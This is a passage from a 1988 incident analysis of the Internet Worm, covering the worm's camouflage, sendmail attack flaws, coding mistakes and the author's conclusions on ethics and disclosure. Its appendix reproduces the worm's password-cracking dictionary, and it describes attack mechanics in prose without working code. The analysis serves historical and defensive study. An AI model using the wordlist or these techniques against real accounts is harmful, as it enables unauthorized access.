- disruption was because it replicated itself exponentially on some
- networks, and because each worm carried no history with it.
- Admittedly, there was a check in place to see if the current
- machine was already infected, but one out of every seven worms
- would never die even if there was an existing infestation.
- Furthermore, worms marked for self-destruction would continue to
- execute up to the point of having made at least one complete pass
- through the password file. Many approaches could have been taken
- by the author\(s\) to slow the growth of the worm or prevent
- reinfestation; little is to be gained from explaining them here,
- but their absence from the worm program is telling. Either the
- author\(s\) did not have any understanding of how the program
- would propagate, or else she/he/they did not care; the existence
- in the Worm of mechanisms to limit growth tends to indicate that
- it was a lack of understanding rather than indifference. Some of
- the algorithms used by the Worm were reasonably clever. One in
- particular is interesting to note: when trying passwords from the
- built-in list, or when trying to break into connected hosts, the
- worm would randomize the list of candidates for trial. Thus, if
- more than one worm were present on the local machine, they would
- be more likely to try candidates in a different order, thus
- maximizing their coverage. This implies, however \(as does the
- action of the pleasequit variable\) that the author\(s\) was not
- overly concerned with the presence of multiple worms on the same
- machine. More to the point, multiple worms were allowed for a
- while in an effort to maximize the spread of the infection. This
- also supports the contention that the author did not understand
- the propagation or load effects of the Worm. The design of the
- vector program, the ``thinning'' protocol, and the use of the
- internal state machine were all clever and non-obvious. The
- overall structure of the program, especially the code associated
- with IP addresses, indicates considerable knowledge of networking
- and the routines available to support it. The knowledge evidenced
- by that code would indicate extensive experience with networking
- facilities. This, coupled with some of the errors in the Worm
- code related to networking, further supports the thesis that the
- author was not a careful programmer; the errors in those parts of
- the code were probably not the result of ignorance or
- inexperience.
-
- 6.3. Camouflage
-
- Great care was taken to prevent the worm program from being
- stopped. This can be seen by the caution with which new files
- were introduced into a machine, including the use of random
- challenges. It can be seen by the fact that every string compiled
- into the worm was encrypted to prevent simple examination. It was
- evidenced by the care with which files associated with the worm
- were deleted from disk at the earliest opportunity, and the
- corresponding contents were encrypted in memory when loaded. It
- was evidenced by the continual forking of the process, and the
- \(faulty\) check for other instances of the worm on the local
- host. The code also evidences precautions against providing
- copies of itself to anyone seeking to stop the worm. It sets its
- resource limits so it cannot dump a core file, and it keeps
- internal data encrypted until used. Luckily, there are other
- methods of obtaining core files and data images, and researchers
- were able to obtain all the information they needed to
- disassemble and reverse-engineer the code. There is no doubt,
- however, that the author\(s\) of the worm intended to make such a
- task as difficult as possible.
-
- 6.4. Specific Comments
-
- Some more specific comments are worth making. These are directed
- to particular aspects of the code rather than the program as a
- whole.
-
- 6.4.1. The sendmail attack
-
- Many sites tend to experience substantial loads because of heavy
- mail traffic. This is especially true at sites with mailing list
- exploders. Thus, the administrators at those sites have
- configured their mailers to queue incoming mail and process the
- queue periodically. The usual configuration is to set sendmail to
- run the queue every 30 to 90 minutes. The attack through sendmail
- would fail on these machines unless the vector program were
- delivered into a nearly empty queue within 120 seconds of it
- being processed. The reason for this is that the infecting worm
- would only wait on the server socket for two minutes after
- delivering the ``infecting mail.'' Thus, on systems with delayed
- queues, the vector process would not get built in time to
- transfer the main worm program over to the target. The vector
- process would fail in its connection attempt and exit with a
- non-zero status. Additionally, the attack through sendmail
- invoked the vector program without a specific path. That is, the
- program was invoked with ``foo'' instead of ``./foo'' as was done
- with the shell-based attack. As a result, on systems where the
- default path used by sendmail's shell did not contain the current
- directory \(``.''\), the invocation of the code would fail. It
- should be noted that such a failure interrupts the processing of
- subsequent commands \(such as the rm of the files\), and this may
- be why many system administrators discovered copies of the vector
- program source code in their /usr/tmp directories.
-
- 6.4.2. The machines involved
-
- As has already been noted, this attack was made only on Sun 3
- machines and VAX machines running BSD UNIX. It has been observed
- in at least one mailing list that had the Sun code been compiled
- with the -mc68010 flag, more Sun machines would have fallen
- victim to the worm. It is a matter of some curiosity why more
- machines were not targeted for this attack. In particular, there
- are many Pyramid, Sequent, Gould, Sun 4, and Sun 386i machines on
- the net. [16] If binary files for those had also been included, the
- worm could
- have spread much further. As it was, some locations such as Ohio
- State were completely spared the effects of the worm because all
- their ``known'' machines were of a type that the worm could not
- infect. Since the author of the program knew how to break into
- arbitrary UNIX machines, it seems odd that he/she did not attempt
- to compile the program on foreign architectures to include with
- the worm.
-
- 6.4.3. Portability considerations
-
- The author\(s\) of the worm may not have had much experience with
- writing portable UNIX code, including shell scripts. Consider
- that in the shell script used to compile the vector, the
- following command is used:
-
-      if [ -f sh ]
-
- The use of the ``['' character as a synonym for the test function
- is not universal. UNIX users with experience writing portable shell
- files tend to spell out the operator test rather than rely on there
- being a link
- to a file named ``['' on any particular system. They also know
- that the test operator is built-in to many shells and thus faster
- than the external [ variant. The test invocation used in the worm
- code also uses the -f flag to test for presence of the file named
- sh. This provided us with the worm ``condom'' published Thursday
- night: [17] creating a directory with the name sh in /usr/tmp causes
- this
- test to fail, as do later attempts to create executable files by
- that name. Experienced shell programmers tend to use the -e
- \(exists\) flag in circumstances such as this, to detect not only
- directories, but sockets, devices, named FIFOs, etc. Other
- colloquialisms are present in the code that bespeak a lack of
- experience writing portable code. One such example is the code
- loop where file units are closed just after the vector program
- starts executing, and again in the main program just after it
- starts executing. In both programs, code such as the following is
- executed:
-
-      for (i = 0; i < 32; i++)
-          close(i);
-
- The portable way to accomplish the task of closing all file
- descriptors \(on Berkeley-derived systems\) is to execute:
-
-      for (i = 0; i < getdtablesize(); i++)
-          close(i);
-
- or the even more efficient
-
-      for (i = getdtablesize()-1; i >= 0; i--)
-          close(i);
-
- This is because the number of file units available \(and thus
- open\) may vary from system to system.
-
- 6.5. Summary
-
- Many other examples can be drawn from the code, but the points
- should be obvious by now: the author of the worm program may have
- been a moderately experienced UNIX programmer, but s/he was by no
- means the ``UNIX Wizard'' many have been claiming. The code
- employs a few clever techniques and tricks, but there is some
- doubt if they are all the original work of the Worm author. The
- code seems to be the product of an inexperienced or sloppy
- programmer. The person \(or persons\) who put this program
- together appears to lack fundamental insight into some
- algorithms, data structures, and network propagation, but at the
- same time has some very sophisticated knowledge of network
- features and facilities. The code does not appear to have been
- tested \(although anything other than unit testing would not be
- simple to do\), or else it was prematurely released. Actually, it
- is possible that both of these conclusions are correct. The
- presence of so much dead and duplicated code coupled with the
- size of some data structures \(such as the 20-slot object code
- array\) argues that the program was intended to be more
- comprehensive.
-
- 7. Conclusions
-
- It is clear from the code that the worm was deliberately designed
- to do two things: infect as many machines as possible, and be
- difficult to track and stop. There can be no question that this
- was deliberate and in no way an accident, although its release may
- have been premature. It is still unknown if this worm, or a future
- version
- of it, was to accomplish any other tasks. Although an author has
- been alleged \(Robert T. Morris\), he has not publicly confessed
- nor has the matter been definitively proven. Considering the
- probability of both civil and criminal legal actions, a
- confession and an explanation are unlikely to be forthcoming any
- time soon. Speculation has centered on motivations as diverse as
- revenge, pure intellectual curiosity, and a desire to impress
- someone. This must remain speculation for the time being,
- however, since we do not have access to a definitive statement
- from the author\(s\). At the least, there must be some question
- about the psychological makeup of someone who would build and run
- such software. [18] Many people have stated that the authors of
- this code [19] must have been ``computer geniuses'' of some sort. I
- have been
- bothered by that supposition since first hearing it, and after
- having examined the code in some depth, I am convinced that this
- program is not evidence to support any such claim. The code was
- apparently unfinished and done by someone clever but not
- particularly gifted, at least in the way we usually associate
- with talented programmers and designers. There were many bugs and
- mistakes in the code that would not be made by a careful,
- competent programmer. The code does not evidence clear
- understanding of good data structuring, algorithms, or even of
- security flaws in UNIX. It does contain clever exploitations of
- two specific flaws in system utilities, but that is hardly
- evidence of genius. In general, the code is not that impressive,
- and its ``success'' was probably due to a large amount of luck
- rather than any programming skill possessed by the author. Chance
- favored most of us, however. The effects of this worm were
- \(largely\) benign, and it was easily stopped. Had the code been
- tested and developed further by someone more experienced, or had
- it been coupled with something destructive, the toll would have
- been considerably higher. I can easily think of several dozen
- people who could have written this program, and not only done it
- with far fewer \(if any\) errors, but made it considerably more
- virulent. Thankfully, those individuals are all responsible,
- dedicated professionals who would not consider such an act. What
- we learn from this about securing our systems will help determine
- if this is the only such incident we ever need to analyze. This
- attack should also point out that we need a better mechanism in
- place to coordinate information about security flaws and attacks.
- The response to this incident was largely ad hoc, and resulted in
- both duplication of effort and a failure to disseminate valuable
- information to sites that needed it. Many site administrators
- discovered the problem from reading the newspaper or watching the
- television. The major sources of information for many of the
- sites affected seem to have been Usenet news groups and a
- mailing list I put together when the worm was first discovered.
- Although useful, these methods did not ensure timely, widespread
- dissemination of useful information, especially since they
- depended on the Internet to work! Over three weeks after this
- incident some sites are still not reconnected to the Internet.
-
- This is the second time in six months that a major panic has hit
- the Internet community. The first occurred in May when a rumor
- swept the community that a ``logic bomb'' had been planted in Sun
- software by a disgruntled employee. Many, many sites turned their
- system clocks back or they shut off their systems to prevent
- damage. The personnel at Sun Microsystems responded to this in an
- admirable fashion, conducting in-house testing to isolate any
- such threat, and issuing information to the community about how
- to deal with the situation. Unfortunately, almost everyone else
- seems to have watched events unfold, glad that they were not the
- ones who had to deal with the situation. The worm has shown us
- that we are all affected by events in our shared environment, and
- we need to develop better information methods outside the network
- before the next crisis. This whole episode should cause us to
- think about the ethics and laws concerning access to computers.
- The technology we use has developed so quickly it is not always
- simple to determine where the proper boundaries of moral action
- may be. Many senior computer professionals started their careers
- years ago by breaking into computer systems at their colleges and
- places of employment to demonstrate their expertise. However,
- times have changed and mastery of computer science and computer
- engineering now involves a great deal more than can be shown by
- using intimate knowledge of the flaws in a particular operating
- system. Entire businesses are now dependent, wisely or not, on
- computer systems. People's money, careers, and possibly even
- their lives may be dependent on the undisturbed functioning of
- computers. As a society, we cannot afford the consequences of
- condoning or encouraging behavior that threatens or damages
- computer systems. As professionals, computer scientists and
- computer engineers cannot afford to tolerate the romanticization
- of computer vandals and computer criminals. This incident should
- also prompt some discussion about distribution of security-
- related information. In particular, since hundreds of sites have
- ``captured'' the binary form of the worm, and since personnel at
- those sites have utilities and knowledge that enable them to
- reverse-engineer the worm code, we should ask how long we can
- expect it to be beneficial to keep the code unpublished. As I
- mentioned
- in the introduction, at least five independent groups have
- produced reverse-engineered versions of the worm, and I expect
- many more have been done or will be attempted, especially if the
- current versions are kept private. Even if none of these versions
- is published in any formal way, hundreds of individuals will have
- had access to a copy before the end of the year. Historically,
- trying to ensure security of software through secrecy has proven
- to be ineffective in the long term. It is vital that we educate
- system administrators and make bug fixes available to them in
- some way that does not compromise their security. Methods that
- prevent the dissemination of information appear to be completely
- contrary to that goal. Last, it is important to note that the
- nature of both the Internet and UNIX helped to defeat the worm as
- well as spread it. The immediacy of communication, the ability to
- copy source and binary files from machine to machine, and the
- widespread availability of both source and expertise allowed
- personnel throughout the country to work together to solve the
- infection even despite the widespread disconnection of parts of
- the network. Although the immediate reaction of some people might
- be to restrict communication or promote a diversity of
- incompatible software options to prevent a recurrence of a worm,
- that would be entirely the wrong reaction. Increasing the
- obstacles to open communication or decreasing the number of
- people with access to in-depth information will not prevent a
- determined attacker; it will only decrease the pool of
- expertise and resources available to fight such an attack.
- Further, such an attitude would be contrary to the whole purpose
- of having an open, research-oriented network. The Worm was caused
- by a breakdown of ethics as well as lapses in security; a
- purely technological attempt at prevention will not address the
- full problem, and may just cause new difficulties.
-
- Acknowledgments
-
- Much of this analysis was performed on reverse-engineered
- versions of the worm code. The following people were involved in
- the production of those versions: Donald J. Becker of Harris
- Corporation, Keith Bostic of Berkeley, Donn Seeley of the
- University of Utah, Chris Torek of the University of Maryland,
- Dave Pare of FX Development, and the team at MIT: Mark W. Eichin,
- Stanley R. Zanarotti, Bill Sommerfeld, Ted Y. Ts'o, Jon Rochlis,
- Ken Raeburn, Hal Birkeland and John T. Kohl. A disassembled
- version of the worm code was provided at Purdue by staff of the
- Purdue University Computing Center, Rich Kulawiec in particular.
- Thanks to the individuals who reviewed early drafts of this paper
- and contributed their advice and expertise: Don Becker, Kathy
- Heaphy, Brian Kantor, R. J. Martin, Richard DeMillo, and
- especially Keith Bostic and Steve Bellovin. My thanks to all
- these individuals. My thanks and apologies to anyone who should
- have been credited and was not.
-
- References
-
- Allm83. Allman, Eric,
- Sendmail - An Internetwork Mail Router,
- University of California, Berkeley, 1983. Issued with the BSD
- UNIX documentation set.
- Brun75. Brunner, John, The Shockwave Rider, Harper & Row, 1975.
- Cohe84. Cohen, Fred, ``Computer Viruses: Theory and
- Experiments,'' PROCEEDINGS OF THE 7TH NATIONAL COMPUTER SECURITY
- CONFERENCE, pp. 240-263, 1984.
- Denn88. Denning, Peter J., ``Computer Viruses,'' AMERICAN
- SCIENTIST, vol. 76, pp. 236-238, May-June 1988.
- Dewd85. Dewdney, A. K., ``A Core War Bestiary of viruses, worms,
- and other threats to computer memories,'' SCIENTIFIC AMERICAN,
- vol. 252, no. 3, pp. 14-23, May 1985.
- Gerr72. Gerrold, David, When Harlie Was One, Ballentine Books,
- 1972. The first edition.
- Gram84. Grampp, Fred. T. and Robert H. Morris, ``UNIX Operating
- System Security,''
- AT&T BELL LABORATORIES TECHNICAL JOURNAL, vol. 63, no. 8, part 2,
- pp. 1649-1672, Oct. 1984.
- Harr77. Harrenstien, K., ``Name/Finger,'' RFC 742, SRI Network
- Information Center, December 1977.
- Morr79. Morris, Robert and Ken Thompson, ``UNIX Password
- Security,'' COMMUNICATIONS OF THE ACM, vol. 22, no. 11, pp. 594-
- 597, ACM, November 1979.
- Post82. Postel, Jonathan B., ``Simple Mail Transfer Protocol,''
- RFC 821, SRI Network Information Center, August 1982.
- Reid87. Reid, Brian, ``Reflections on Some Recent Widespread
- Computer Breakins,'' COMMUNICATIONS OF THE ACM, vol. 30, no. 2,
- pp. 103-105, ACM, February 1987.
- Ritc79. Ritchie, Dennis M., ``On the Security of UNIX,'' in UNIX
- SUPPLEMENTARY DOCUMENTS, AT&T, 1979.
- Seel88. Seeley, Donn, ``A Tour of the Worm,'' TECHNICAL REPORT,
- Computer Science Dept., University of Utah, November 1988.
- Unpublished report.
- Shoc82. Shoch, John F. and Jon A. Hupp, ``The Worm Programs - Early
- Experience with a Distributed Computation,'' COMMUNICATIONS
- OF THE ACM, vol. 25, no. 3, pp. 172-180, ACM, March 1982.
-
- Appendix A The Dictionary
-
- What follows is the mini-dictionary of words contained in the
- worm. These were tried when attempting to break user passwords.
- Looking through this list is, in some sense, revealing, but
- actually raises a significant question: how was this list chosen?
- The assumption has been expressed by many people that this list
- represents words commonly used as passwords; this seems unlikely.
- Common choices for passwords usually include fantasy characters,
- but this list contains none of the likely choices \(e.g.,
- ``hobbit,'' ``dwarf,'' ``gandalf,'' ``skywalker,'' ``conan''\).
- Names of relatives and friends are often used, and we see women's
- names like ``jessica,'' ``caroline,'' and ``edwina,'' but no
- instance of the common names ``jennifer'' or ``kathy.'' Further,
- there are almost no men's names such as ``thomas'' or either of
- ``stephen'' or ``steven'' \(or ``eugene''!\). Additionally, none
- of these have the initial letters capitalized, although that is
- often how they are used in passwords. Also of interest, there are
- no obscene words in this dictionary, yet many reports of
- concerted password cracking experiments have revealed that there
- are a significant number of users who use such words \(or
- phrases\) as passwords. The list contains at least one incorrect
- spelling: ``commrades'' instead of ``comrades''; I also believe
- that ``markus'' is a misspelling of ``marcus.'' Some of the words
- do not appear in standard dictionaries and are non-English names:
- ``jixian,'' ``vasant,'' ``puneet,'' etc. There are also some
- unusual words in this list that I would not expect to be
- considered common: ``anthropogenic,'' ``imbroglio,'' ``umesh,''
- ``rochester,'' ``fungible,'' ``cerulean,'' etc. I imagine that
- this list was derived from some data gathering with a limited set
- of passwords, probably in some known \(to the author\) computing
- environment. That is, some dictionary-based or brute-force attack
- was used to crack a selection of a few hundred passwords taken
- from a small set of machines. Other approaches to gathering
- passwords could also have been used: Ethernet monitors, Trojan
- Horse login programs, etc. However they may have been cracked,
- the ones that were broken would then have been added to this
- dictionary. Interestingly enough, many of these words are not in
- the standard on-line dictionary \(in /usr/dict/words\). As such,
- these words are useful as a supplement to the main dictionary-
- based attack the worm used as strategy #4, but I would suspect
- them to be of limited use before that time. This unusual
- composition might be useful in the determination of the
- author\(s\) of this code. One approach would be to find a system
- with a user or local dictionary containing these words. Another
- would be to find some system\(s\) where a significant quantity of
- passwords could be broken with this list.
-
- aaa academia aerobics
- airplane albany albatross albert alex alexander algebra aliases
- alphabet ama amorphous analog anchor andromache animals answer
- anthropogenic anvils anything aria ariadne arrow arthur athena
- atmosphere aztecs azure bacchus bailey banana bananas bandit
- banks barber baritone bass bassoon batman beater beauty beethoven
- beloved benz beowulf berkeley berliner beryl beverly bicameral
- bob brenda brian bridget broadway bumbling burgess campanile
- cantor cardinal carmen carolina caroline cascades castle cat
- cayuga celtics cerulean change charles charming charon chester
- cigar classic clusters coffee coke collins commrades computer
- condo cookie cooper cornelius couscous creation creosote cretin
- daemon dancer daniel danny dave december defoe deluge desperate
- develop dieter digital discovery disney dog drought duncan eager
- easier edges edinburgh edwin edwina egghead eiderdown eileen
- einstein elephant elizabeth ellen emerald engine engineer
- enterprise enzyme ersatz establish estate euclid evelyn extension
- fairway felicia fender fermat fidelity finite fishers flakes
- float flower flowers foolproof football foresight format forsythe
- fourier fred friend frighten fun fungible gabriel gardner
- garfield gauss george gertrude ginger glacier gnu golfer gorgeous
- gorges gosling gouge graham gryphon guest guitar gumption guntis
- hacker hamlet handily happening harmony harold harvey hebrides
- heinlein hello help herbert hiawatha hibernia honey horse horus
- hutchins imbroglio imperial include ingres inna innocuous
- irishman isis japan jessica jester jixian johnny joseph joshua
- judith juggle julia kathleen kermit kernel kirkland knight ladle
- lambda lamination larkin larry lazarus lebesgue lee leland leroy
- lewis light lisa louis lynne macintosh mack maggot magic malcolm
- mark markus marty marvin master maurice mellon merlin mets
- michael michelle mike minimum minsky moguls moose morley mozart
- nancy napoleon nepenthe ness network newton next noxious
- nutrition nyquist oceanography ocelot olivetti olivia oracle orca
- orwell osiris outlaw oxford pacific painless pakistan pam papers
- password patricia penguin peoria percolate persimmon persona pete
- peter philip phoenix pierre pizza plover plymouth polynomial
- pondering pork poster praise precious prelude prince princeton
- protect protozoa pumpkin puneet puppet rabbit rachmaninoff
- rainbow raindrop raleigh random rascal really rebecca remote rick
- ripple robotics rochester rolex romano ronald rosebud rosemary
- roses ruben rules ruth sal saxon scamper scheme scott scotty
- secret sensor serenity sharks sharon sheffield sheldon shiva
- shivers shuttle signature simon simple singer single smile smiles
- smooch smother snatch snoopy soap socrates sossina sparrows spit
- spring springer squires strangle stratford stuttgart subway
- success summer super superstage support supported surfer suzanne
- swearer symmetry tangerine tape target tarragon taylor telephone
- temptation thailand tiger toggle tomato topography tortoise
- toyota trails trivial trombone tubas tuttle umesh unhappy unicorn
- unknown urchin utility vasant vertigo vicky village virginia
- warren water weenie whatnot whiting whitney will william
- williamsburg willie winston wisconsin wizard wombat woodwind
- wormwood yacov yang yellowstone yosemite zap zimmerman
-
- Appendix B The Vector Program
-
- The worm was brought over to each machine it infected via the
- actions of a small program I call the vector program. Other
- individuals have been referring to this as the grappling hook
- program. Some people have referred to it as the l1.c program,
- since that is the suffix used on each copy. The source for this
- program
- would be transferred to the victim machine using one of the
- methods discussed in the paper. It would then be compiled and
- invoked on the victim machine with three command line arguments:
- the canonical IP address of the infecting machine, the number of
- the TCP port to connect to on that machine to get copies of the
- main worm files, and a magic number that effectively acted as a
- one-time-challenge password. If the ``server'' worm on the remote
- host and port did not receive the same magic number back before
- starting the transfer, it would immediately disconnect from the
- vector program. This can only have been to prevent someone from
- attempting to ``capture'' the binary files by spoofing a worm
- ``server.'' This code also goes to some effort to hide itself,
- both by zeroing out the argument vector, and by immediately
- forking a copy of itself. If a failure occurred in transferring a
- file, the code deleted all files it had already transferred, then
- it exited. One other key item to note in this code is that the
- vector was designed to be able to transfer up to 20 files; it was
- used with only three. This can only make one wonder if a more
- extensive version of the worm was planned for a later date, and
- if that version might have carried with it other command files,
- password data, or possibly local virus or trojan horse programs.
-
- <<what follows is a pair of programs that I was unable to decode
- with any dependability>>
-
- Notes:
-
- BSD is an acronym for Berkeley Software Distribution.
- UNIX is a registered trademark of AT&T Laboratories.
- VAX is a trademark of Digital Equipment Corporation.
-
- The second edition of the book, just published, has been
- ``updated'' to omit this subplot about VIRUS.
-
- 5
- It is probably a coincidence that the Internet Worm was loosed on
- November 2, the eve of this ``birthday.''
- 6
- Note that a widely used alternative to sendmail, MMDF, is also
- viewed as too complex and large by many users. Further, it is
- not perceived to be as flexible as sendmail if it is necessary
- to establish special addressing and handling rules when bridging
- heterogeneous networks.
- 7
- Strictly speaking, the password is not encrypted. A block of zero
- bits is repeatedly encrypted using the user password, and the
- result of this encryption is what is saved. See [Morr79] for
- more details.
- 8
- Such a list would likely include all words in the dictionary, the
- reverse of all such words, and a large collection of proper
- names.
- 8
- rexec is a remote command execution service. It requires that a
- username/password combination be supplied as part of the
- request.
- 9
- This was compiled in as port number 23357, on host 127.0.0.1 \(loopback\).
- 10
- Using TCP port 11357 on host 128.32.137.13.
- 11
- Interestingly, although the program was coded to get the address
- of the host on the remote end of point-to-point links, no use
- seems to have been made of that information.
- 12
- As if some of them aren't suspicious enough!
- 13
- This appears to be a bug. The probable assumption was that the
- routine hl would handle infection of local hosts, but hl calls
- this routine! Thus, local hosts were never infected via this
- route.
- 14
- This is puzzling. The appropriate file to scan for equivalent
- hosts would have been the .rhosts file, not the .forward file.
- 15
- Private communication from someone present at the meeting.
- 16
- The thought of a Sequent Symmetry or Gould NP1 infected with
- multiple copies of the worm is an awesome \(and awful\) one. The
- effects noticed locally when the worm broke into a mostly unloaded
- VAX 8800 were spectacular. The effects on a machine with one or
- two orders of magnitude more capacity are frightening to
- contemplate.
- 17
- Developed by Kevin Braunsdorf and Rich Kulawiec at Purdue PUCC.
- 18
- Rick Adams, of the Center for Seismic Studies, has commented that
- we may someday hear that the worm was loosed to impress Jodie
- Foster. Without further information, this is as valid a
- speculation as any other, and should raise further disturbing
- questions; not everyone with access to computers is rational and
- sane, and future attacks may reflect this.
- 19
- Throughout this paper I have been writing author\(s\) instead of
- author. It occurs to me that most of the mail, Usenet postings,
- and media coverage of this incident have assumed that it was
- author \(singular\). Are we so unaccustomed to working together
- on programs that this is our natural inclination? Or is it that
- we find it hard to believe that more than one individual could
- have such poor judgement? I also noted that most of the people I
- spoke with seemed to assume that the worm author was male. I
- leave it to others to speculate on the value, if any, of these
- observations.
-
-